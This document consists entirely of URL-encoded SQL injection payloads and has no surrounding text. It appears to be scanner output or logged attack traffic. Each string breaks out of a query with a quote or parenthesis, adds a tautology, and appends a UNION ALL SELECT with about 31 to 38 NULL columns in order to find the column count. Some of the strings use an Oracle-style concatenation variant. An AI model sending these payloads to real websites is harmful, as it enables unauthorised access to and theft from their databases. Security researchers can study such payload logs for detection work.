1%29%20WHERE%209865%3D9865%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%209547%3D9547%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%208393%3D8393%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%204815%3D4815%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%201380%3D1380%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%206152%3D6152%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%29%20WHERE%204649%3D4649%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%204768%3D4768%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%204180%3D4180%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%205690%3D5690%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%202296%3D2296%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%207662%3D7662%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%202124%3D2124%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%203781%3D3781%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%205371%3D5371%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%201677%3D1677%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%29%20WHERE%207206%3D7206%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%207405%3D7405%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%209879%3D9879%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%204736%3D4736%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%205894%3D5894%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%207866%3D7866%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%206800%3D6800%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%209574%3D9574%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%203427%3D3427%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%206545%3D6545%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20WHERE%202778%3D2778%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%206124%3D6124%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%203824%3D3824%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%204580%3D4580%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%202981%3D2981%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%201522%3D1522%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%202849%3D2849%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%206893%3D6893%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%205161%3D5161%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%207642%3D7642%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%22%20WHERE%209509%3D9509%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1%27%20%7C%7C%20%28SELECT%209349%20FROM%20DUAL%20WHERE%206796%3D6796%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201827%20FROM%20DUAL%20WHERE%204958%3D4958%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207639%20FROM%20DUAL%20WHERE%201159%3D1159%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%209667%20FROM%20DUAL%20WHERE%203192%3D3192%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204737%20FROM%20DUAL%20WHERE%208708%3D8708%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207762%20FROM%20DUAL%20WHERE%206155%3D6155%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207642%20FROM%20DUAL%20WHERE%207448%3D7448%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%201673%20FROM%20DUAL%20WHERE%203541%3D3541%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%7C%7C%20%27 